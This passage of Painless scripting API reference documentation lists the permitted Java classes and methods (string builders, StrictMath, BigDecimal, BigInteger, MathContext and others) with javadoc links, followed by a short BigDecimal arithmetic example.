{java11-javadoc}/java.base/java/lang/StackTraceElement.html#getFileName()[getFileName]() -* int {java11-javadoc}/java.base/java/lang/StackTraceElement.html#getLineNumber()[getLineNumber]() -* null {java11-javadoc}/java.base/java/lang/StackTraceElement.html#getMethodName()[getMethodName]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/lang/StackTraceElement.html#isNativeMethod()[isNativeMethod]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-StrictMath]] -==== StrictMath -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#E[E] -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#PI[PI] -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#IEEEremainder(double,double)[IEEEremainder](double, double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#abs(double)[abs](double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#acos(double)[acos](double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#asin(double)[asin](double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#atan(double)[atan](double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#atan2(double,double)[atan2](double, double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#cbrt(double)[cbrt](double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#ceil(double)[ceil](double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#copySign(double,double)[copySign](double, double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#cos(double)[cos](double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#cosh(double)[cosh](double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#exp(double)[exp](double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#expm1(double)[expm1](double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#floor(double)[floor](double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#hypot(double,double)[hypot](double, double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#log(double)[log](double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#log10(double)[log10](double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#log1p(double)[log1p](double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#max(double,double)[max](double, double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#min(double,double)[min](double, double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#nextAfter(double,double)[nextAfter](double, double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#nextDown(double)[nextDown](double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#nextUp(double)[nextUp](double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#pow(double,double)[pow](double, double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#random()[random]() -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#rint(double)[rint](double) -* static long {java11-javadoc}/java.base/java/lang/StrictMath.html#round(double)[round](double) -* 
static double {java11-javadoc}/java.base/java/lang/StrictMath.html#scalb(double,int)[scalb](double, int) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#signum(double)[signum](double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#sin(double)[sin](double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#sinh(double)[sinh](double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#sqrt(double)[sqrt](double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#tan(double)[tan](double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#tanh(double)[tanh](double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#toDegrees(double)[toDegrees](double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#toRadians(double)[toRadians](double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#ulp(double)[ulp](double) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-StringBuffer]] -==== StringBuffer -* {java11-javadoc}/java.base/java/lang/StringBuffer.html#()[StringBuffer]() -* {java11-javadoc}/java.base/java/lang/StringBuffer.html#(java.lang.CharSequence)[StringBuffer](CharSequence) -* StringBuffer {java11-javadoc}/java.base/java/lang/StringBuffer.html#append(java.lang.Object)[append](def) -* StringBuffer {java11-javadoc}/java.base/java/lang/StringBuffer.html#append(java.lang.CharSequence,int,int)[append](CharSequence, int, int) -* StringBuffer {java11-javadoc}/java.base/java/lang/StringBuffer.html#appendCodePoint(int)[appendCodePoint](int) -* int {java11-javadoc}/java.base/java/lang/StringBuffer.html#capacity()[capacity]() -* char {java11-javadoc}/java.base/java/lang/CharSequence.html#charAt(int)[charAt](int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#chars()[chars]() -* int {java11-javadoc}/java.base/java/lang/StringBuffer.html#codePointAt(int)[codePointAt](int) -* int {java11-javadoc}/java.base/java/lang/StringBuffer.html#codePointBefore(int)[codePointBefore](int) -* int {java11-javadoc}/java.base/java/lang/StringBuffer.html#codePointCount(int,int)[codePointCount](int, int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#codePoints()[codePoints]() -* int {java11-javadoc}/java.base/java/lang/Comparable.html#compareTo(java.lang.Object)[compareTo](def) -* StringBuffer {java11-javadoc}/java.base/java/lang/StringBuffer.html#delete(int,int)[delete](int, int) -* StringBuffer {java11-javadoc}/java.base/java/lang/StringBuffer.html#deleteCharAt(int)[deleteCharAt](int) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* void {java11-javadoc}/java.base/java/lang/StringBuffer.html#getChars(int,int,char%5B%5D,int)[getChars](int, int, char[], int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/StringBuffer.html#indexOf(java.lang.String)[indexOf](null) -* int {java11-javadoc}/java.base/java/lang/StringBuffer.html#indexOf(java.lang.String,int)[indexOf](null, int) -* StringBuffer {java11-javadoc}/java.base/java/lang/StringBuffer.html#insert(int,java.lang.Object)[insert](int, def) -* int 
{java11-javadoc}/java.base/java/lang/StringBuffer.html#lastIndexOf(java.lang.String)[lastIndexOf](null) -* int {java11-javadoc}/java.base/java/lang/StringBuffer.html#lastIndexOf(java.lang.String,int)[lastIndexOf](null, int) -* int {java11-javadoc}/java.base/java/lang/CharSequence.html#length()[length]() -* int {java11-javadoc}/java.base/java/lang/StringBuffer.html#offsetByCodePoints(int,int)[offsetByCodePoints](int, int) -* StringBuffer {java11-javadoc}/java.base/java/lang/StringBuffer.html#replace(int,int,java.lang.String)[replace](int, int, null) -* null replaceAll(Pattern, Function) -* null replaceFirst(Pattern, Function) -* StringBuffer {java11-javadoc}/java.base/java/lang/StringBuffer.html#reverse()[reverse]() -* void {java11-javadoc}/java.base/java/lang/StringBuffer.html#setCharAt(int,char)[setCharAt](int, char) -* void {java11-javadoc}/java.base/java/lang/StringBuffer.html#setLength(int)[setLength](int) -* CharSequence {java11-javadoc}/java.base/java/lang/CharSequence.html#subSequence(int,int)[subSequence](int, int) -* null {java11-javadoc}/java.base/java/lang/StringBuffer.html#substring(int)[substring](int) -* null {java11-javadoc}/java.base/java/lang/StringBuffer.html#substring(int,int)[substring](int, int) -* null {java11-javadoc}/java.base/java/lang/CharSequence.html#toString()[toString]() - - -[[painless-api-reference-shared-StringBuilder]] -==== StringBuilder -* {java11-javadoc}/java.base/java/lang/StringBuilder.html#()[StringBuilder]() -* {java11-javadoc}/java.base/java/lang/StringBuilder.html#(java.lang.CharSequence)[StringBuilder](CharSequence) -* StringBuilder {java11-javadoc}/java.base/java/lang/StringBuilder.html#append(java.lang.Object)[append](def) -* StringBuilder {java11-javadoc}/java.base/java/lang/StringBuilder.html#append(java.lang.CharSequence,int,int)[append](CharSequence, int, int) -* StringBuilder {java11-javadoc}/java.base/java/lang/StringBuilder.html#appendCodePoint(int)[appendCodePoint](int) -* int {java11-javadoc}/java.base/java/lang/StringBuilder.html#capacity()[capacity]() -* char {java11-javadoc}/java.base/java/lang/CharSequence.html#charAt(int)[charAt](int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#chars()[chars]() -* int {java11-javadoc}/java.base/java/lang/StringBuilder.html#codePointAt(int)[codePointAt](int) -* int {java11-javadoc}/java.base/java/lang/StringBuilder.html#codePointBefore(int)[codePointBefore](int) -* int {java11-javadoc}/java.base/java/lang/StringBuilder.html#codePointCount(int,int)[codePointCount](int, int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#codePoints()[codePoints]() -* int {java11-javadoc}/java.base/java/lang/Comparable.html#compareTo(java.lang.Object)[compareTo](def) -* StringBuilder {java11-javadoc}/java.base/java/lang/StringBuilder.html#delete(int,int)[delete](int, int) -* StringBuilder {java11-javadoc}/java.base/java/lang/StringBuilder.html#deleteCharAt(int)[deleteCharAt](int) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* void {java11-javadoc}/java.base/java/lang/StringBuilder.html#getChars(int,int,char%5B%5D,int)[getChars](int, int, char[], int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/StringBuilder.html#indexOf(java.lang.String)[indexOf](null) -* int {java11-javadoc}/java.base/java/lang/StringBuilder.html#indexOf(java.lang.String,int)[indexOf](null, int) -* StringBuilder 
{java11-javadoc}/java.base/java/lang/StringBuilder.html#insert(int,java.lang.Object)[insert](int, def) -* int {java11-javadoc}/java.base/java/lang/StringBuilder.html#lastIndexOf(java.lang.String)[lastIndexOf](null) -* int {java11-javadoc}/java.base/java/lang/StringBuilder.html#lastIndexOf(java.lang.String,int)[lastIndexOf](null, int) -* int {java11-javadoc}/java.base/java/lang/CharSequence.html#length()[length]() -* int {java11-javadoc}/java.base/java/lang/StringBuilder.html#offsetByCodePoints(int,int)[offsetByCodePoints](int, int) -* StringBuilder {java11-javadoc}/java.base/java/lang/StringBuilder.html#replace(int,int,java.lang.String)[replace](int, int, null) -* null replaceAll(Pattern, Function) -* null replaceFirst(Pattern, Function) -* StringBuilder {java11-javadoc}/java.base/java/lang/StringBuilder.html#reverse()[reverse]() -* void {java11-javadoc}/java.base/java/lang/StringBuilder.html#setCharAt(int,char)[setCharAt](int, char) -* void {java11-javadoc}/java.base/java/lang/StringBuilder.html#setLength(int)[setLength](int) -* CharSequence {java11-javadoc}/java.base/java/lang/CharSequence.html#subSequence(int,int)[subSequence](int, int) -* null {java11-javadoc}/java.base/java/lang/StringBuilder.html#substring(int)[substring](int) -* null {java11-javadoc}/java.base/java/lang/StringBuilder.html#substring(int,int)[substring](int, int) -* null {java11-javadoc}/java.base/java/lang/CharSequence.html#toString()[toString]() - - -[[painless-api-reference-shared-StringIndexOutOfBoundsException]] -==== StringIndexOutOfBoundsException -* {java11-javadoc}/java.base/java/lang/StringIndexOutOfBoundsException.html#()[StringIndexOutOfBoundsException]() -* {java11-javadoc}/java.base/java/lang/StringIndexOutOfBoundsException.html#(java.lang.String)[StringIndexOutOfBoundsException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-System]] -==== System -* static void {java11-javadoc}/java.base/java/lang/System.html#arraycopy(java.lang.Object,int,java.lang.Object,int,int)[arraycopy](Object, int, Object, int, int) -* static long {java11-javadoc}/java.base/java/lang/System.html#currentTimeMillis()[currentTimeMillis]() -* static long {java11-javadoc}/java.base/java/lang/System.html#nanoTime()[nanoTime]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-TypeNotPresentException]] -==== TypeNotPresentException -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int 
{java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* null {java11-javadoc}/java.base/java/lang/TypeNotPresentException.html#typeName()[typeName]() - - -[[painless-api-reference-shared-UnsupportedOperationException]] -==== UnsupportedOperationException -* {java11-javadoc}/java.base/java/lang/UnsupportedOperationException.html#()[UnsupportedOperationException]() -* {java11-javadoc}/java.base/java/lang/UnsupportedOperationException.html#(java.lang.String)[UnsupportedOperationException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Void]] -==== Void -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[role="exclude",id="painless-api-reference-shared-java-math"] -=== Shared API for package java.math -See the <<painless-api-reference, Painless API Reference>> for a high-level overview of all packages and classes. - -[[painless-api-reference-shared-BigDecimal]] -==== BigDecimal -* static BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#ONE[ONE] -* static BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#TEN[TEN] -* static BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#ZERO[ZERO] -* static BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#valueOf(double)[valueOf](double) -* {java11-javadoc}/java.base/java/math/BigDecimal.html#(java.lang.String)[BigDecimal](null) -* {java11-javadoc}/java.base/java/math/BigDecimal.html#(java.lang.String,java.math.MathContext)[BigDecimal](null, MathContext) -* BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#abs()[abs]() -* BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#abs(java.math.MathContext)[abs](MathContext) -* BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#add(java.math.BigDecimal)[add](BigDecimal) -* BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#add(java.math.BigDecimal,java.math.MathContext)[add](BigDecimal, MathContext) -* byte {java11-javadoc}/java.base/java/lang/Number.html#byteValue()[byteValue]() -* byte {java11-javadoc}/java.base/java/math/BigDecimal.html#byteValueExact()[byteValueExact]() -* int {java11-javadoc}/java.base/java/math/BigDecimal.html#compareTo(java.math.BigDecimal)[compareTo](BigDecimal) -* BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#divide(java.math.BigDecimal)[divide](BigDecimal) -* BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#divide(java.math.BigDecimal,java.math.MathContext)[divide](BigDecimal, MathContext) -* BigDecimal[] {java11-javadoc}/java.base/java/math/BigDecimal.html#divideAndRemainder(java.math.BigDecimal)[divideAndRemainder](BigDecimal) -* BigDecimal[] 
{java11-javadoc}/java.base/java/math/BigDecimal.html#divideAndRemainder(java.math.BigDecimal,java.math.MathContext)[divideAndRemainder](BigDecimal, MathContext) -* BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#divideToIntegralValue(java.math.BigDecimal)[divideToIntegralValue](BigDecimal) -* BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#divideToIntegralValue(java.math.BigDecimal,java.math.MathContext)[divideToIntegralValue](BigDecimal, MathContext) -* double {java11-javadoc}/java.base/java/lang/Number.html#doubleValue()[doubleValue]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* float {java11-javadoc}/java.base/java/lang/Number.html#floatValue()[floatValue]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/Number.html#intValue()[intValue]() -* int {java11-javadoc}/java.base/java/math/BigDecimal.html#intValueExact()[intValueExact]() -* long {java11-javadoc}/java.base/java/lang/Number.html#longValue()[longValue]() -* long {java11-javadoc}/java.base/java/math/BigDecimal.html#longValueExact()[longValueExact]() -* BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#max(java.math.BigDecimal)[max](BigDecimal) -* BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#min(java.math.BigDecimal)[min](BigDecimal) -* BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#movePointLeft(int)[movePointLeft](int) -* BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#movePointRight(int)[movePointRight](int) -* BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#multiply(java.math.BigDecimal)[multiply](BigDecimal) -* BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#multiply(java.math.BigDecimal,java.math.MathContext)[multiply](BigDecimal, MathContext) -* BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#negate()[negate]() -* BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#negate(java.math.MathContext)[negate](MathContext) -* BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#plus()[plus]() -* BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#plus(java.math.MathContext)[plus](MathContext) -* BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#pow(int)[pow](int) -* BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#pow(int,java.math.MathContext)[pow](int, MathContext) -* int {java11-javadoc}/java.base/java/math/BigDecimal.html#precision()[precision]() -* BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#remainder(java.math.BigDecimal)[remainder](BigDecimal) -* BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#remainder(java.math.BigDecimal,java.math.MathContext)[remainder](BigDecimal, MathContext) -* BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#round(java.math.MathContext)[round](MathContext) -* int {java11-javadoc}/java.base/java/math/BigDecimal.html#scale()[scale]() -* BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#scaleByPowerOfTen(int)[scaleByPowerOfTen](int) -* BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#setScale(int)[setScale](int) -* BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#setScale(int,java.math.RoundingMode)[setScale](int, RoundingMode) -* short {java11-javadoc}/java.base/java/lang/Number.html#shortValue()[shortValue]() -* short 
{java11-javadoc}/java.base/java/math/BigDecimal.html#shortValueExact()[shortValueExact]() -* int {java11-javadoc}/java.base/java/math/BigDecimal.html#signum()[signum]() -* BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#stripTrailingZeros()[stripTrailingZeros]() -* BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#subtract(java.math.BigDecimal)[subtract](BigDecimal) -* BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#subtract(java.math.BigDecimal,java.math.MathContext)[subtract](BigDecimal, MathContext) -* BigInteger {java11-javadoc}/java.base/java/math/BigDecimal.html#toBigInteger()[toBigInteger]() -* BigInteger {java11-javadoc}/java.base/java/math/BigDecimal.html#toBigIntegerExact()[toBigIntegerExact]() -* null {java11-javadoc}/java.base/java/math/BigDecimal.html#toEngineeringString()[toEngineeringString]() -* null {java11-javadoc}/java.base/java/math/BigDecimal.html#toPlainString()[toPlainString]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#ulp()[ulp]() - - -[[painless-api-reference-shared-BigInteger]] -==== BigInteger -* static BigInteger {java11-javadoc}/java.base/java/math/BigInteger.html#ONE[ONE] -* static BigInteger {java11-javadoc}/java.base/java/math/BigInteger.html#TEN[TEN] -* static BigInteger {java11-javadoc}/java.base/java/math/BigInteger.html#ZERO[ZERO] -* static BigInteger {java11-javadoc}/java.base/java/math/BigInteger.html#valueOf(long)[valueOf](long) -* {java11-javadoc}/java.base/java/math/BigInteger.html#(java.lang.String)[BigInteger](null) -* {java11-javadoc}/java.base/java/math/BigInteger.html#(java.lang.String,int)[BigInteger](null, int) -* BigInteger {java11-javadoc}/java.base/java/math/BigInteger.html#abs()[abs]() -* BigInteger {java11-javadoc}/java.base/java/math/BigInteger.html#add(java.math.BigInteger)[add](BigInteger) -* BigInteger {java11-javadoc}/java.base/java/math/BigInteger.html#and(java.math.BigInteger)[and](BigInteger) -* BigInteger {java11-javadoc}/java.base/java/math/BigInteger.html#andNot(java.math.BigInteger)[andNot](BigInteger) -* int {java11-javadoc}/java.base/java/math/BigInteger.html#bitCount()[bitCount]() -* int {java11-javadoc}/java.base/java/math/BigInteger.html#bitLength()[bitLength]() -* byte {java11-javadoc}/java.base/java/lang/Number.html#byteValue()[byteValue]() -* byte {java11-javadoc}/java.base/java/math/BigInteger.html#byteValueExact()[byteValueExact]() -* BigInteger {java11-javadoc}/java.base/java/math/BigInteger.html#clearBit(int)[clearBit](int) -* int {java11-javadoc}/java.base/java/math/BigInteger.html#compareTo(java.math.BigInteger)[compareTo](BigInteger) -* BigInteger {java11-javadoc}/java.base/java/math/BigInteger.html#divide(java.math.BigInteger)[divide](BigInteger) -* BigInteger[] {java11-javadoc}/java.base/java/math/BigInteger.html#divideAndRemainder(java.math.BigInteger)[divideAndRemainder](BigInteger) -* double {java11-javadoc}/java.base/java/lang/Number.html#doubleValue()[doubleValue]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* BigInteger {java11-javadoc}/java.base/java/math/BigInteger.html#flipBit(int)[flipBit](int) -* float {java11-javadoc}/java.base/java/lang/Number.html#floatValue()[floatValue]() -* BigInteger {java11-javadoc}/java.base/java/math/BigInteger.html#gcd(java.math.BigInteger)[gcd](BigInteger) -* int {java11-javadoc}/java.base/java/math/BigInteger.html#getLowestSetBit()[getLowestSetBit]() -* int 
{java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/Number.html#intValue()[intValue]() -* int {java11-javadoc}/java.base/java/math/BigInteger.html#intValueExact()[intValueExact]() -* long {java11-javadoc}/java.base/java/lang/Number.html#longValue()[longValue]() -* long {java11-javadoc}/java.base/java/math/BigInteger.html#longValueExact()[longValueExact]() -* BigInteger {java11-javadoc}/java.base/java/math/BigInteger.html#max(java.math.BigInteger)[max](BigInteger) -* BigInteger {java11-javadoc}/java.base/java/math/BigInteger.html#min(java.math.BigInteger)[min](BigInteger) -* BigInteger {java11-javadoc}/java.base/java/math/BigInteger.html#mod(java.math.BigInteger)[mod](BigInteger) -* BigInteger {java11-javadoc}/java.base/java/math/BigInteger.html#modInverse(java.math.BigInteger)[modInverse](BigInteger) -* BigInteger {java11-javadoc}/java.base/java/math/BigInteger.html#modPow(java.math.BigInteger,java.math.BigInteger)[modPow](BigInteger, BigInteger) -* BigInteger {java11-javadoc}/java.base/java/math/BigInteger.html#multiply(java.math.BigInteger)[multiply](BigInteger) -* BigInteger {java11-javadoc}/java.base/java/math/BigInteger.html#negate()[negate]() -* BigInteger {java11-javadoc}/java.base/java/math/BigInteger.html#not()[not]() -* BigInteger {java11-javadoc}/java.base/java/math/BigInteger.html#or(java.math.BigInteger)[or](BigInteger) -* BigInteger {java11-javadoc}/java.base/java/math/BigInteger.html#pow(int)[pow](int) -* BigInteger {java11-javadoc}/java.base/java/math/BigInteger.html#remainder(java.math.BigInteger)[remainder](BigInteger) -* BigInteger {java11-javadoc}/java.base/java/math/BigInteger.html#setBit(int)[setBit](int) -* BigInteger {java11-javadoc}/java.base/java/math/BigInteger.html#shiftLeft(int)[shiftLeft](int) -* BigInteger {java11-javadoc}/java.base/java/math/BigInteger.html#shiftRight(int)[shiftRight](int) -* short {java11-javadoc}/java.base/java/lang/Number.html#shortValue()[shortValue]() -* short {java11-javadoc}/java.base/java/math/BigInteger.html#shortValueExact()[shortValueExact]() -* int {java11-javadoc}/java.base/java/math/BigInteger.html#signum()[signum]() -* BigInteger {java11-javadoc}/java.base/java/math/BigInteger.html#subtract(java.math.BigInteger)[subtract](BigInteger) -* boolean {java11-javadoc}/java.base/java/math/BigInteger.html#testBit(int)[testBit](int) -* byte[] {java11-javadoc}/java.base/java/math/BigInteger.html#toByteArray()[toByteArray]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* null {java11-javadoc}/java.base/java/math/BigInteger.html#toString(int)[toString](int) -* BigInteger {java11-javadoc}/java.base/java/math/BigInteger.html#xor(java.math.BigInteger)[xor](BigInteger) - - -[[painless-api-reference-shared-MathContext]] -==== MathContext -* static MathContext {java11-javadoc}/java.base/java/math/MathContext.html#DECIMAL128[DECIMAL128] -* static MathContext {java11-javadoc}/java.base/java/math/MathContext.html#DECIMAL32[DECIMAL32] -* static MathContext {java11-javadoc}/java.base/java/math/MathContext.html#DECIMAL64[DECIMAL64] -* static MathContext {java11-javadoc}/java.base/java/math/MathContext.html#UNLIMITED[UNLIMITED] -* {java11-javadoc}/java.base/java/math/MathContext.html#(int)[MathContext](int) -* {java11-javadoc}/java.base/java/math/MathContext.html#(int,java.math.RoundingMode)[MathContext](int, RoundingMode) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int 
{java11-javadoc}/java.base/java/math/MathContext.html#getPrecision()[getPrecision]() -* RoundingMode {java11-javadoc}/java.base/java/math/MathContext.html#getRoundingMode()[getRoundingMode]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-RoundingMode]] -==== RoundingMode -* static RoundingMode {java11-javadoc}/java.base/java/math/RoundingMode.html#CEILING[CEILING] -* static RoundingMode {java11-javadoc}/java.base/java/math/RoundingMode.html#DOWN[DOWN] -* static RoundingMode {java11-javadoc}/java.base/java/math/RoundingMode.html#FLOOR[FLOOR] -* static RoundingMode {java11-javadoc}/java.base/java/math/RoundingMode.html#HALF_DOWN[HALF_DOWN] -* static RoundingMode {java11-javadoc}/java.base/java/math/RoundingMode.html#HALF_EVEN[HALF_EVEN] -* static RoundingMode {java11-javadoc}/java.base/java/math/RoundingMode.html#HALF_UP[HALF_UP] -* static RoundingMode {java11-javadoc}/java.base/java/math/RoundingMode.html#UNNECESSARY[UNNECESSARY] -* static RoundingMode {java11-javadoc}/java.base/java/math/RoundingMode.html#UP[UP] -* static RoundingMode {java11-javadoc}/java.base/java/math/RoundingMode.html#valueOf(java.lang.String)[valueOf](null) -* static RoundingMode[] {java11-javadoc}/java.base/java/math/RoundingMode.html#values()[values]() -* int {java11-javadoc}/java.base/java/lang/Enum.html#compareTo(java.lang.Enum)[compareTo](Enum) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Enum.html#name()[name]() -* int {java11-javadoc}/java.base/java/lang/Enum.html#ordinal()[ordinal]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[role="exclude",id="painless-api-reference-shared-java-text"] -=== Shared API for package java.text -See the <<painless-api-reference, Painless API Reference>> for a high-level overview of all packages and classes. 
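
As a quick illustration of how the `java.math` classes listed above fit together in a script, here is a minimal Painless sketch. The numbers and the bare `return` are hypothetical and not tied to any particular script context; every call corresponds to a constructor or method in the `BigDecimal`, `MathContext`, and `RoundingMode` listings above.

[source,painless]
----
// Minimal sketch (hypothetical values): exact decimal arithmetic in a script.
BigDecimal price = new BigDecimal("19.995");
BigDecimal qty   = new BigDecimal("3");
BigDecimal total = price.multiply(qty);                    // 59.985, exact

// A MathContext is required when a quotient would not terminate.
MathContext mc = new MathContext(10, RoundingMode.HALF_EVEN);
BigDecimal perDay = total.divide(new BigDecimal("7"), mc); // 8.569285714

// Round to cents for display.
return perDay.setScale(2, RoundingMode.HALF_UP).toPlainString(); // "8.57"
----
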
